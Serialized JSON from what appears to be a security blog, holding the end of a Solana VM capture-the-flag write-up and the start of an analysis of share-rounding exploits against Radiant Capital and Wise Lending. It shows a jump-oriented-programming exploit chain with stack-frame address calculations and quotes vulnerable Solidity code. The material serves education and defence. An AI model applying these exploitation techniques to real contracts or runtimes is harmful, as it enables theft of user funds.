",{"type":25,"tag":162,"props":49427,"children":49430},{"href":49428,"rel":49429},"https://github.com/solana-labs/solana/blob/v1.17.4/programs/bpf_loader/src/syscalls/cpi.rs#L458-L637",[166],[49431],{"type":31,"value":49432},"implementation",{"type":31,"value":49434}," provides more clarity:",{"type":25,"tag":2039,"props":49436,"children":49437},{},[49438],{"type":25,"tag":2043,"props":49439,"children":49440},{},[49441,49446,49448,49455],{"type":25,"tag":82,"props":49442,"children":49444},{"className":49443},[],[49445],{"type":31,"value":49301},{"type":31,"value":49447}," points to a ",{"type":25,"tag":162,"props":49449,"children":49452},{"href":49450,"rel":49451},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/stable_layout/stable_instruction.rs#L33",[166],[49453],{"type":31,"value":49454},"StableInstruction",{"type":31,"value":1472},{"type":25,"tag":38,"props":49457,"children":49458},{},[49459],{"type":25,"tag":6467,"props":49460,"children":49462},{"alt":49454,"src":49461},"/posts/jumping-around-in-the-vm/stable_ix.svg",[],{"type":25,"tag":2039,"props":49464,"children":49465},{},[49466,49491],{"type":25,"tag":2043,"props":49467,"children":49468},{},[49469,49474,49476,49481,49483,49490],{"type":25,"tag":82,"props":49470,"children":49472},{"className":49471},[],[49473],{"type":31,"value":49326},{"type":31,"value":49475}," points to a slice of ",{"type":25,"tag":82,"props":49477,"children":49479},{"className":49478},[],[49480],{"type":31,"value":49351},{"type":31,"value":49482},"  ",{"type":25,"tag":162,"props":49484,"children":49487},{"href":49485,"rel":49486},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/account_info.rs#L19-L36",[166],[49488],{"type":31,"value":49489},"AccountInfos",{"type":31,"value":179},{"type":25,"tag":2043,"props":49492,"children":49493},{},[49494,49499,49501,49506,49508,49513],{"type":25,"tag":82,"props":49495,"children":49497},{"className":49496},[],[49498],{"type":31,"value":49368},{"type":31,"value":49500}," is a bit trickier, it points to a slice of length ",{"type":25,"tag":82,"props":49502,"children":49504},{"className":49503},[],[49505],{"type":31,"value":49393},{"type":31,"value":49507},", containing slices of ",{"type":25,"tag":82,"props":49509,"children":49511},{"className":49510},[],[49512],{"type":31,"value":7378},{"type":31,"value":179},{"type":25,"tag":38,"props":49515,"children":49516},{},[49517],{"type":25,"tag":6467,"props":49518,"children":49521},{"alt":49519,"src":49520},"signers.drawio","/posts/jumping-around-in-the-vm/signers.svg",[],{"type":25,"tag":38,"props":49523,"children":49524},{},[49525,49527,49532],{"type":31,"value":49526},"Where do we store those fake parameters? We can store them directly inside the input data, and just write the pointers to them on the stack through the write gadget. Note that these writes are to ",{"type":25,"tag":64,"props":49528,"children":49529},{},[49530],{"type":31,"value":49531},"future call frames",{"type":31,"value":179},{"type":25,"tag":38,"props":49534,"children":49535},{},[49536,49538,49545],{"type":31,"value":49537},"Now that we have all the parts, all we need is to string it together. The full ",{"type":25,"tag":162,"props":49539,"children":49542},{"href":49540,"rel":49541},"https://github.com/chen-robert/paradigmctf-2023/blob/main/jotterp/framework-solve/src/main.rs",[166],[49543],{"type":31,"value":49544},"reference solution can be found here",{"type":31,"value":179},{"type":25,"tag":38,"props":49547,"children":49548},{},[49549],{"type":31,"value":49550},"Here's a visualization of the final JOP chain.",{"type":25,"tag":206,"props":49552,"children":49554},{"className":47917,"code":49553,"language":47919,"meta":7,"style":7},"graph BT\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n    C --> E[3: process]\n    E --> F[4: Write account_infos.len to target_r10 - 128]\n    E --> G[4: process]\n    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n    G --> I[5: process]\n    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n    I --> K[6: process]\n    K --> M[7: Write HeapBase to target_r10 - 120]\n    K --> N[7: process]\n    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n    N --> O[8: Write 0x4337 to the account]\n",[49555],{"type":25,"tag":82,"props":49556,"children":49557},{"__ignoreMap":7},[49558,49566,49573,49580,49588,49595,49603,49611,49619,49627,49635,49643,49651,49659,49667],{"type":25,"tag":216,"props":49559,"children":49560},{"class":6922,"line":6923},[49561],{"type":25,"tag":216,"props":49562,"children":49563},{},[49564],{"type":31,"value":49565},"graph BT\n",{"type":25,"tag":216,"props":49567,"children":49568},{"class":6922,"line":6769},[49569],{"type":25,"tag":216,"props":49570,"children":49571},{},[49572],{"type":31,"value":47939},{"type":25,"tag":216,"props":49574,"children":49575},{"class":6922,"line":6778},[49576],{"type":25,"tag":216,"props":49577,"children":49578},{},[49579],{"type":31,"value":47947},{"type":25,"tag":216,"props":49581,"children":49582},{"class":6922,"line":7005},[49583],{"type":25,"tag":216,"props":49584,"children":49585},{},[49586],{"type":31,"value":49587},"    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n",{"type":25,"tag":216,"props":49589,"children":49590},{"class":6922,"line":7110},[49591],{"type":25,"tag":216,"props":49592,"children":49593},{},[49594],{"type":31,"value":47963},{"type":25,"tag":216,"props":49596,"children":49597},{"class":6922,"line":7216},[49598],{"type":25,"tag":216,"props":49599,"children":49600},{},[49601],{"type":31,"value":49602},"    E --> F[4: Write account_infos.len to target_r10 - 128]\n",{"type":25,"tag":216,"props":49604,"children":49605},{"class":6922,"line":7244},[49606],{"type":25,"tag":216,"props":49607,"children":49608},{},[49609],{"type":31,"value":49610},"    E --> G[4: process]\n",{"type":25,"tag":216,"props":49612,"children":49613},{"class":6922,"line":7257},[49614],{"type":25,"tag":216,"props":49615,"children":49616},{},[49617],{"type":31,"value":49618},"    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n",{"type":25,"tag":216,"props":49620,"children":49621},{"class":6922,"line":7275},[49622],{"type":25,"tag":216,"props":49623,"children":49624},{},[49625],{"type":31,"value":49626},"    G --> I[5: process]\n",{"type":25,"tag":216,"props":49628,"children":49629},{"class":6922,"line":7296},[49630],{"type":25,"tag":216,"props":49631,"children":49632},{},[49633],{"type":31,"value":49634},"    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n",{"type":25,"tag":216,"props":49636,"children":49637},{"class":6922,"line":7305},[49638],{"type":25,"tag":216,"props":49639,"children":49640},{},[49641],{"type":31,"value":49642},"    I --> K[6: process]\n",{"type":25,"tag":216,"props":49644,"children":49645},{"class":6922,"line":7557},[49646],{"type":25,"tag":216,"props":49647,"children":49648},{},[49649],{"type":31,"value":49650},"    K --> M[7: Write HeapBase to target_r10 - 120]\n",{"type":25,"tag":216,"props":49652,"children":49653},{"class":6922,"line":7574},[49654],{"type":25,"tag":216,"props":49655,"children":49656},{},[49657],{"type":31,"value":49658},"    K --> N[7: process]\n",{"type":25,"tag":216,"props":49660,"children":49661},{"class":6922,"line":7591},[49662],{"type":25,"tag":216,"props":49663,"children":49664},{},[49665],{"type":31,"value":49666},"    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n",{"type":25,"tag":216,"props":49668,"children":49669},{"class":6922,"line":7604},[49670],{"type":25,"tag":216,"props":49671,"children":49672},{},[49673],{"type":31,"value":49674},"    N --> O[8: Write 0x4337 to the account]\n",{"type":25,"tag":38,"props":49676,"children":49677},{},[49678,49680,49686],{"type":31,"value":49679},"Small note: ",{"type":25,"tag":82,"props":49681,"children":49683},{"className":49682},[],[49684],{"type":31,"value":49685},"target_r10",{"type":31,"value":49687}," is the address of the call frame when the CPI gadget is invoked, which, as shown in the graph, is the 8th frame. Its address can be calculated as follows:",{"type":25,"tag":206,"props":49689,"children":49691},{"className":6915,"code":49690,"language":6914,"meta":7,"style":7},"fn call_frame_addr(depth: u64) -> u64 {\n    0x200000000 + 0x2000 * depth + 0x1000\n}\n// call_frame_addr(8) = 0x200011000\n",[49692],{"type":25,"tag":82,"props":49693,"children":49694},{"__ignoreMap":7},[49695,49740,49775,49782],{"type":25,"tag":216,"props":49696,"children":49697},{"class":6922,"line":6923},[49698,49702,49707,49711,49716,49720,49724,49728,49732,49736],{"type":25,"tag":216,"props":49699,"children":49700},{"style":6936},[49701],{"type":31,"value":24226},{"type":25,"tag":216,"props":49703,"children":49704},{"style":7047},[49705],{"type":31,"value":49706}," call_frame_addr",{"type":25,"tag":216,"props":49708,"children":49709},{"style":6964},[49710],{"type":31,"value":1850},{"type":25,"tag":216,"props":49712,"children":49713},{"style":6947},[49714],{"type":31,"value":49715},"depth",{"type":25,"tag":216,"props":49717,"children":49718},{"style":6953},[49719],{"type":31,"value":1472},{"type":25,"tag":216,"props":49721,"children":49722},{"style":7375},[49723],{"type":31,"value":9811},{"type":25,"tag":216,"props":49725,"children":49726},{"style":6964},[49727],{"type":31,"value":7036},{"type":25,"tag":216,"props":49729,"children":49730},{"style":6953},[49731],{"type":31,"value":17714},{"type":25,"tag":216,"props":49733,"children":49734},{"style":7375},[49735],{"type":31,"value":9811},{"type":25,"tag":216,"props":49737,"children":49738},{"style":6964},[49739],{"type":31,"value":7241},{"type":25,"tag":216,"props":49741,"children":49742},{"class":6922,"line":6769},[49743,49748,49752,49757,49761,49766,49770],{"type":25,"tag":216,"props":49744,"children":49745},{"style":6989},[49746],{"type":31,"value":49747},"    0x200000000",{"type":25,"tag":216,"props":49749,"children":49750},{"style":6953},[49751],{"type":31,"value":12858},{"type":25,"tag":216,"props":49753,"children":49754},{"style":6989},[49755],{"type":31,"value":49756}," 0x2000",{"type":25,"tag":216,"props":49758,"children":49759},{"style":6953},[49760],{"type":31,"value":13773},{"type":25,"tag":216,"props":49762,"children":49763},{"style":6947},[49764],{"type":31,"value":49765}," depth",{"type":25,"tag":216,"props":49767,"children":49768},{"style":6953},[49769],{"type":31,"value":12858},{"type":25,"tag":216,"props":49771,"children":49772},{"style":6989},[49773],{"type":31,"value":49774}," 0x1000\n",{"type":25,"tag":216,"props":49776,"children":49777},{"class":6922,"line":6778},[49778],{"type":25,"tag":216,"props":49779,"children":49780},{"style":6964},[49781],{"type":31,"value":7874},{"type":25,"tag":216,"props":49783,"children":49784},{"class":6922,"line":7005},[49785],{"type":25,"tag":216,"props":49786,"children":49787},{"style":6927},[49788],{"type":31,"value":49789},"// call_frame_addr(8) = 0x200011000\n",{"type":25,"tag":26,"props":49791,"children":49792},{"id":32892},[49793],{"type":31,"value":22907},{"type":25,"tag":38,"props":49795,"children":49796},{},[49797,49799,49806],{"type":31,"value":49798},"Most blockchain vulnerabilities are high-level business logic bugs. While low-level Solana bugs are rare, ",{"type":25,"tag":162,"props":49800,"children":49803},{"href":49801,"rel":49802},"https://osec.io/blog/2022-12-09-rust-realloc-and-references",[166],[49804],{"type":31,"value":49805},"they do exist",{"type":31,"value":179},{"type":25,"tag":38,"props":49808,"children":49809},{},[49810],{"type":31,"value":49811},"In this blog post, we provided an exploration of the exploitation side of security. There's a surprising amount of work necessary to go from powerful memory corruption primitives to full control of the program.",{"type":25,"tag":38,"props":49813,"children":49814},{},[49815,49817,49822],{"type":31,"value":49816},"Security requires a top-to-bottom understanding of the execution environment. We hope this challenge and blog post motivate others to understand the ",{"type":25,"tag":64,"props":49818,"children":49819},{},[49820],{"type":31,"value":49821},"entire",{"type":31,"value":49823}," runtime.",{"type":25,"tag":9316,"props":49825,"children":49826},{},[49827],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":49829},[49830,49834,49835,49838],{"id":22916,"depth":6769,"text":22919,"children":49831},[49832,49833],{"id":44505,"depth":6778,"text":44508},{"id":45824,"depth":6778,"text":45827},{"id":47063,"depth":6769,"text":47066},{"id":47899,"depth":6769,"text":47902,"children":49836},[49837],{"id":48013,"depth":6778,"text":48016},{"id":32892,"depth":6769,"text":22907},"content:blog:2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm",{"_path":49843,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":49844,"description":49845,"author":49846,"image":49847,"date":49849,"isFeatured":16,"onBlogPage":16,"body":49850,"_type":6798,"_id":50996,"_source":6800,"_file":50997,"_stem":50998,"_extension":6803},"/blog/2024-01-18-rounding-bugs","Rounding Bugs: An Analysis","Rounding-related hacks are having a moment in the spotlight. We explore these exploits, correct some popular misunderstandings, and provide mitigations.",[9670],{"src":49848},"/posts/rounding-bugs/cover.png","2024-01-18",{"type":22,"children":49851,"toc":50985},[49852,49856,49884,49889,49902,49907,49913,49918,49923,49928,49933,49946,49958,49978,49998,50003,50008,50026,50032,50037,50043,50057,50070,50075,50081,50095,50100,50122,50355,50360,50365,50378,50618,50628,50633,50639,50644,50649,50682,50687,50698,50704,50709,50723,50851,50865,50941,50946,50957,50962,50967,50971,50976,50981],{"type":25,"tag":26,"props":49853,"children":49854},{"id":32975},[49855],{"type":31,"value":32978},{"type":25,"tag":38,"props":49857,"children":49858},{},[49859,49861,49868,49869,49876,49878,49883],{"type":31,"value":49860},"Recently, there's been a series of attacks exploiting share rounding against lending protocols. Rounding attacks are already known to developers on ",{"type":25,"tag":162,"props":49862,"children":49865},{"href":49863,"rel":49864},"https://neodyme.io/de/blog/lending_disclosure",[166],[49866],{"type":31,"value":49867},"fast",{"type":31,"value":7026},{"type":25,"tag":162,"props":49870,"children":49873},{"href":49871,"rel":49872},"https://osec.io/blog/2022-04-26-spl-swap-rounding",[166],[49874],{"type":31,"value":49875},"cheap",{"type":31,"value":49877}," chains with high-value tokens. These attacks are novel in that they also work against low-value tokens on expensive chains. ",{"type":25,"tag":64,"props":49879,"children":49880},{},[49881],{"type":31,"value":49882},"Most people haven't considered what happens when shares are worth a lot",{"type":31,"value":179},{"type":25,"tag":38,"props":49885,"children":49886},{},[49887],{"type":31,"value":49888},"Much of the previous discourse has mischaracterized the rootcause of these hacks. For example, the presence of flashloans is largely irrelevant. At a high level, these attacks only require two key steps:",{"type":25,"tag":6711,"props":49890,"children":49891},{},[49892,49897],{"type":25,"tag":2043,"props":49893,"children":49894},{},[49895],{"type":31,"value":49896},"Inflate share value (token to share conversion rate)",{"type":25,"tag":2043,"props":49898,"children":49899},{},[49900],{"type":31,"value":49901},"Exploit rounding bug",{"type":25,"tag":38,"props":49903,"children":49904},{},[49905],{"type":31,"value":49906},"In this blog post, we explore these attacks in detail and provide potential mitigations.",{"type":25,"tag":26,"props":49908,"children":49910},{"id":49909},"model",[49911],{"type":31,"value":49912},"Model",{"type":25,"tag":38,"props":49914,"children":49915},{},[49916],{"type":31,"value":49917},"Before we dive in, there's some helpful background information we'll share first.",{"type":25,"tag":38,"props":49919,"children":49920},{},[49921],{"type":31,"value":49922},"A common form of accounting is the share and token model. When a user deposits a token, they receive back shares. Shares can accrue value, whether through interest or protocol fees.",{"type":25,"tag":38,"props":49924,"children":49925},{},[49926],{"type":31,"value":49927},"When users want to withdraw their tokens, they burn shares and receive the corresponding amount of tokens back. This is nice in theory. Unfortunately, in the real world, we have fixed precision. You can't have 1.01 shares, it needs to be either one or two. Which way should we round?",{"type":25,"tag":38,"props":49929,"children":49930},{},[49931],{"type":31,"value":49932},"This question is more complex than it may appear. Let's walk through an example.",{"type":25,"tag":38,"props":49934,"children":49935},{},[49936,49938,49944],{"type":31,"value":49937},"Say we initialize shares and tokens in a one-to-one ratio. After an initial deposit of 1000 tokens, the pool state is ",{"type":25,"tag":82,"props":49939,"children":49941},{"className":49940},[],[49942],{"type":31,"value":49943},"1000:1000",{"type":31,"value":49945}," (1000 tokens to 1000 shares).",{"type":25,"tag":38,"props":49947,"children":49948},{},[49949,49951,49957],{"type":31,"value":49950},"After accruing fees, the pool gains one token for a new ratio of ",{"type":25,"tag":82,"props":49952,"children":49954},{"className":49953},[],[49955],{"type":31,"value":49956},"1001:1000",{"type":31,"value":179},{"type":25,"tag":38,"props":49959,"children":49960},{},[49961,49963,49969,49971,49976],{"type":31,"value":49962},"How many tokens should we get back when withdrawing 999 shares? The real answer is ",{"type":25,"tag":82,"props":49964,"children":49966},{"className":49965},[],[49967],{"type":31,"value":49968},"1001/1000*999 = 999.999",{"type":31,"value":49970},". Unfortunately, we can only send the user 1000 or 999 tokens. For now, let's assume we round ",{"type":25,"tag":64,"props":49972,"children":49973},{},[49974],{"type":31,"value":49975},"down",{"type":31,"value":49977}," against the user.",{"type":25,"tag":38,"props":49979,"children":49980},{},[49981,49983,49989,49991,49997],{"type":31,"value":49982},"If we give the user 999 tokens, the new pool state is ",{"type":25,"tag":82,"props":49984,"children":49986},{"className":49985},[],[49987],{"type":31,"value":49988},"2:1",{"type":31,"value":49990},". The value of a share doubled! What happens if we deposit 1 more token? We'll get back zero shares, further inflating the ratio to ",{"type":25,"tag":82,"props":49992,"children":49994},{"className":49993},[],[49995],{"type":31,"value":49996},"3:1",{"type":31,"value":179},{"type":25,"tag":38,"props":49999,"children":50000},{},[50001],{"type":31,"value":50002},"Small decisions like rounding direction can have a big impact on share valuation. Generally, share valuation isn't a strict security boundary.",{"type":25,"tag":38,"props":50004,"children":50005},{},[50006],{"type":31,"value":50007},"The above is a bit of a simplification. In practice, there are several protocol-specific design decisions:",{"type":25,"tag":6711,"props":50009,"children":50010},{},[50011,50016,50021],{"type":25,"tag":2043,"props":50012,"children":50013},{},[50014],{"type":31,"value":50015},"Can you deposit and receive back zero shares? If not, you'll need to spend more effort to exploit the rounding error",{"type":25,"tag":2043,"props":50017,"children":50018},{},[50019],{"type":31,"value":50020},"When you withdraw, are you withdrawing shares or tokens?",{"type":25,"tag":2043,"props":50022,"children":50023},{},[50024],{"type":31,"value":50025},"Can you directly manipulate pool state by sending tokens? Hopefully not.",{"type":25,"tag":26,"props":50027,"children":50029},{"id":50028},"decisions",[50030],{"type":31,"value":50031},"Decisions",{"type":25,"tag":38,"props":50033,"children":50034},{},[50035],{"type":31,"value":50036},"Let's assume that we're able to inflate the value of a share. How can we actually exploit this?",{"type":25,"tag":606,"props":50038,"children":50040},{"id":50039},"radiant-capital",[50041],{"type":31,"value":50042},"Radiant Capital",{"type":25,"tag":38,"props":50044,"children":50045},{},[50046,50048,50055],{"type":31,"value":50047},"Radiant Capital was ",{"type":25,"tag":162,"props":50049,"children":50052},{"href":50050,"rel":50051},"https://arbiscan.io/tx/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b",[166],[50053],{"type":31,"value":50054},"hacked on Jan 2nd",{"type":31,"value":50056}," for about $4.5M. This was the original example of exploiting rounding on otherwise inconsequential shares.",{"type":25,"tag":38,"props":50058,"children":50059},{},[50060,50062,50069],{"type":31,"value":50061},"The exploit is relatively straightforward and ",{"type":25,"tag":162,"props":50063,"children":50066},{"href":50064,"rel":50065},"https://medium.com/@_kcyw/radiant-capital-hack-explained-1633289be150",[166],[50067],{"type":31,"value":50068},"has already been covered previously",{"type":31,"value":179},{"type":25,"tag":38,"props":50071,"children":50072},{},[50073],{"type":31,"value":50074},"At a high level, this exploit is exactly what you'd expect. If shares were worth $1000 each, and the user tried to withdraw $1999, they only needed to burn one share. Free money.",{"type":25,"tag":606,"props":50076,"children":50078},{"id":50077},"wise-lending",[50079],{"type":31,"value":50080},"Wise Lending",{"type":25,"tag":38,"props":50082,"children":50083},{},[50084,50086,50093],{"type":31,"value":50085},"Wise Lending was ",{"type":25,"tag":162,"props":50087,"children":50090},{"href":50088,"rel":50089},"https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31",[166],[50091],{"type":31,"value":50092},"hacked on January 13th",{"type":31,"value":50094}," for just under $460,000.",{"type":25,"tag":38,"props":50096,"children":50097},{},[50098],{"type":31,"value":50099},"Again, share prices were inflated artificially high. However, the rounding direction seemed to be correct. This was a new variant.",{"type":25,"tag":38,"props":50101,"children":50102},{},[50103,50105,50112,50114,50121],{"type":31,"value":50104},"This is ",{"type":25,"tag":162,"props":50106,"children":50109},{"href":50107,"rel":50108},"https://etherscan.io/address/0x829c3AE2e82760eCEaD0F384918a650F8a31Ba18",[166],[50110],{"type":31,"value":50111},"the code responsible",{"type":31,"value":50113}," for checking if a withdrawal is valid. As a hint, a critical invariant for lending protocols is that there's ",{"type":25,"tag":162,"props":50115,"children":50118},{"href":50116,"rel":50117},"https://www.chainalysis.com/blog/euler-finance-flash-loan-attack/",[166],[50119],{"type":31,"value":50120},"no way to atomically self-bankrupt",{"type":31,"value":179},{"type":25,"tag":206,"props":50123,"children":50125},{"className":8423,"code":50124,"language":8422,"meta":7,"style":7},"uint256 withdrawValue = WISE_ORACLE.getTokensInETH(\n    _poolToken,\n    _amount\n)\n    * WISE_LENDING.lendingPoolData(_poolToken).collateralFactor\n    / PRECISION_FACTOR_E18;\n\nbool state = borrowPercentageCap\n    * (overallETHCollateralsWeighted(_nftId) - withdrawValue)\n    / PRECISION_FACTOR_E18\n    \u003C borrowAmount;\n\nif (state == true) {\n    revert ResultsInBadDebt();\n}\n",[50126],{"type":25,"tag":82,"props":50127,"children":50128},{"__ignoreMap":7},[50129,50160,50168,50176,50183,50205,50218,50225,50246,50276,50288,50300,50307,50331,50348],{"type":25,"tag":216,"props":50130,"children":50131},{"class":6922,"line":6923},[50132,50137,50142,50146,50151,50156],{"type":25,"tag":216,"props":50133,"children":50134},{"style":7375},[50135],{"type":31,"value":50136},"uint256",{"type":25,"tag":216,"props":50138,"children":50139},{"style":6964},[50140],{"type":31,"value":50141}," withdrawValue ",{"type":25,"tag":216,"props":50143,"children":50144},{"style":6953},[50145],{"type":31,"value":266},{"type":25,"tag":216,"props":50147,"children":50148},{"style":6964},[50149],{"type":31,"value":50150}," WISE_ORACLE.",{"type":25,"tag":216,"props":50152,"children":50153},{"style":7047},[50154],{"type":31,"value":50155},"getTokensInETH",{"type":25,"tag":216,"props":50157,"children":50158},{"style":6964},[50159],{"type":31,"value":7420},{"type":25,"tag":216,"props":50161,"children":50162},{"class":6922,"line":6769},[50163],{"type":25,"tag":216,"props":50164,"children":50165},{"style":6964},[50166],{"type":31,"value":50167},"    _poolToken,\n",{"type":25,"tag":216,"props":50169,"children":50170},{"class":6922,"line":6778},[50171],{"type":25,"tag":216,"props":50172,"children":50173},{"style":6964},[50174],{"type":31,"value":50175},"    _amount\n",{"type":25,"tag":216,"props":50177,"children":50178},{"class":6922,"line":7005},[50179],{"type":25,"tag":216,"props":50180,"children":50181},{"style":6964},[50182],{"type":31,"value":7107},{"type":25,"tag":216,"props":50184,"children":50185},{"class":6922,"line":7110},[50186,50190,50195,50200],{"type":25,"tag":216,"props":50187,"children":50188},{"style":6953},[50189],{"type":31,"value":21519},{"type":25,"tag":216,"props":50191,"children":50192},{"style":6964},[50193],{"type":31,"value":50194}," WISE_LENDING.",{"type":25,"tag":216,"props":50196,"children":50197},{"style":7047},[50198],{"type":31,"value":50199},"lendingPoolData",{"type":25,"tag":216,"props":50201,"children":50202},{"style":6964},[50203],{"type":31,"value":50204},"(_poolToken).collateralFactor\n",{"type":25,"tag":216,"props":50206,"children":50207},{"class":6922,"line":7216},[50208,50213],{"type":25,"tag":216,"props":50209,"children":50210},{"style":6953},[50211],{"type":31,"value":50212},"    /",{"type":25,"tag":216,"props":50214,"children":50215},{"style":6964},[50216],{"type":31,"value":50217}," PRECISION_FACTOR_E18;\n",{"type":25,"tag":216,"props":50219,"children":50220},{"class":6922,"line":7244},[50221],{"type":25,"tag":216,"props":50222,"children":50223},{"emptyLinePlaceholder":16},[50224],{"type":31,"value":7642},{"type":25,"tag":216,"props":50226,"children":50227},{"class":6922,"line":7257},[50228,50232,50237,50241],{"type":25,"tag":216,"props":50229,"children":50230},{"style":7375},[50231],{"type":31,"value":33646},{"type":25,"tag":216,"props":50233,"children":50234},{"style":6964},[50235],{"type":31,"value":50236}," state ",{"type":25,"tag":216,"props":50238,"children":50239},{"style":6953},[50240],{"type":31,"value":266},{"type":25,"tag":216,"props":50242,"children":50243},{"style":6964},[50244],{"type":31,"value":50245}," borrowPercentageCap\n",{"type":25,"tag":216,"props":50247,"children":50248},{"class":6922,"line":7275},[50249,50253,50257,50262,50267,50271],{"type":25,"tag":216,"props":50250,"children":50251},{"style":6953},[50252],{"type":31,"value":21519},{"type":25,"tag":216,"props":50254,"children":50255},{"style":6964},[50256],{"type":31,"value":7016},{"type":25,"tag":216,"props":50258,"children":50259},{"style":7047},[50260],{"type":31,"value":50261},"overallETHCollateralsWeighted",{"type":25,"tag":216,"props":50263,"children":50264},{"style":6964},[50265],{"type":31,"value":50266},"(_nftId) ",{"type":25,"tag":216,"props":50268,"children":50269},{"style":6953},[50270],{"type":31,"value":8276},{"type":25,"tag":216,"props":50272,"children":50273},{"style":6964},[50274],{"type":31,"value":50275}," withdrawValue)\n",{"type":25,"tag":216,"props":50277,"children":50278},{"class":6922,"line":7296},[50279,50283],{"type":25,"tag":216,"props":50280,"children":50281},{"style":6953},[50282],{"type":31,"value":50212},{"type":25,"tag":216,"props":50284,"children":50285},{"style":6964},[50286],{"type":31,"value":50287}," PRECISION_FACTOR_E18\n",{"type":25,"tag":216,"props":50289,"children":50290},{"class":6922,"line":7305},[50291,50295],{"type":25,"tag":216,"props":50292,"children":50293},{"style":6953},[50294],{"type":31,"value":36408},{"type":25,"tag":216,"props":50296,"children":50297},{"style":6964},[50298],{"type":31,"value":50299}," borrowAmount;\n",{"type":25,"tag":216,"props":50301,"children":50302},{"class":6922,"line":7557},[50303],{"type":25,"tag":216,"props":50304,"children":50305},{"emptyLinePlaceholder":16},[50306],{"type":31,"value":7642},{"type":25,"tag":216,"props":50308,"children":50309},{"class":6922,"line":7574},[50310,50314,50319,50323,50327],{"type":25,"tag":216,"props":50311,"children":50312},{"style":6973},[50313],{"type":31,"value":19537},{"type":25,"tag":216,"props":50315,"children":50316},{"style":6964},[50317],{"type":31,"value":50318}," (state ",{"type":25,"tag":216,"props":50320,"children":50321},{"style":6953},[50322],{"type":31,"value":12528},{"type":25,"tag":216,"props":50324,"children":50325},{"style":6936},[50326],{"type":31,"value":16425},{"type":25,"tag":216,"props":50328,"children":50329},{"style":6964},[50330],{"type":31,"value":18761},{"type":25,"tag":216,"props":50332,"children":50333},{"class":6922,"line":7591},[50334,50339,50344],{"type":25,"tag":216,"props":50335,"children":50336},{"style":6973},[50337],{"type":31,"value":50338},"    revert",{"type":25,"tag":216,"props":50340,"children":50341},{"style":7047},[50342],{"type":31,"value":50343}," ResultsInBadDebt",{"type":25,"tag":216,"props":50345,"children":50346},{"style":6964},[50347],{"type":31,"value":7633},{"type":25,"tag":216,"props":50349,"children":50350},{"class":6922,"line":7604},[50351],{"type":25,"tag":216,"props":50352,"children":50353},{"style":6964},[50354],{"type":31,"value":7874},{"type":25,"tag":38,"props":50356,"children":50357},{},[50358],{"type":31,"value":50359},"The critical observation is that this code operates on token amounts, while the internal accounting necessarily operates on shares.",{"type":25,"tag":38,"props":50361,"children":50362},{},[50363],{"type":31,"value":50364},"Consider: you have one share worth $1000 and (correctly) can borrow $500. If you tried to withdraw $1, the code would round up to withdraw your one share worth $1000, causing you to be immediately liquidatable!",{"type":25,"tag":38,"props":50366,"children":50367},{},[50368,50370,50376],{"type":31,"value":50369},"And indeed, ",{"type":25,"tag":162,"props":50371,"children":50374},{"href":50372,"rel":50373},"https://etherscan.io/address/0x37e49bf3749513A02FA535F0CbC383796E8107E4",[166],[50375],{"type":31,"value":50080},{"type":31,"value":50377}," rounds up the share value.",{"type":25,"tag":206,"props":50379,"children":50381},{"className":8423,"code":50380,"language":8422,"meta":7,"style":7},"function _calculateShares(\n    uint256 _product,\n    uint256 _pseudo,\n    bool _maxSharePrice\n)\n    private\n    pure\n    returns (uint256)\n{\n    return _maxSharePrice == true\n        ? _product % _pseudo == 0\n            ? _product / _pseudo\n            : _product / _pseudo + 1\n        : _product / _pseudo;\n}\n",[50382],{"type":25,"tag":82,"props":50383,"children":50384},{"__ignoreMap":7},[50385,50401,50418,50434,50447,50454,50462,50470,50490,50497,50518,50539,50561,50590,50611],{"type":25,"tag":216,"props":50386,"children":50387},{"class":6922,"line":6923},[50388,50392,50397],{"type":25,"tag":216,"props":50389,"children":50390},{"style":6936},[50391],{"type":31,"value":35339},{"type":25,"tag":216,"props":50393,"children":50394},{"style":7047},[50395],{"type":31,"value":50396}," _calculateShares",{"type":25,"tag":216,"props":50398,"children":50399},{"style":6964},[50400],{"type":31,"value":7420},{"type":25,"tag":216,"props":50402,"children":50403},{"class":6922,"line":6769},[50404,50409,50414],{"type":25,"tag":216,"props":50405,"children":50406},{"style":7375},[50407],{"type":31,"value":50408},"    uint256",{"type":25,"tag":216,"props":50410,"children":50411},{"style":6947},[50412],{"type":31,"value":50413}," _product",{"type":25,"tag":216,"props":50415,"children":50416},{"style":6964},[50417],{"type":31,"value":7465},{"type":25,"tag":216,"props":50419,"children":50420},{"class":6922,"line":6778},[50421,50425,50430],{"type":25,"tag":216,"props":50422,"children":50423},{"style":7375},[50424],{"type":31,"value":50408},{"type":25,"tag":216,"props":50426,"children":50427},{"style":6947},[50428],{"type":31,"value":50429}," _pseudo",{"type":25,"tag":216,"props":50431,"children":50432},{"style":6964},[50433],{"type":31,"value":7465},{"type":25,"tag":216,"props":50435,"children":50436},{"class":6922,"line":7005},[50437,50442],{"type":25,"tag":216,"props":50438,"children":50439},{"style":7375},[50440],{"type":31,"value":50441},"    bool",{"type":25,"tag":216,"props":50443,"children":50444},{"style":6947},[50445],{"type":31,"value":50446}," _maxSharePrice\n",{"type":25,"tag":216,"props":50448,"children":50449},{"class":6922,"line":7110},[50450],{"type":25,"tag":216,"props":50451,"children":50452},{"style":6964},[50453],{"type":31,"value":7107},{"type":25,"tag":216,"props":50455,"children":50456},{"class":6922,"line":7216},[50457],{"type":25,"tag":216,"props":50458,"children":50459},{"style":6936},[50460],{"type":31,"value":50461},"    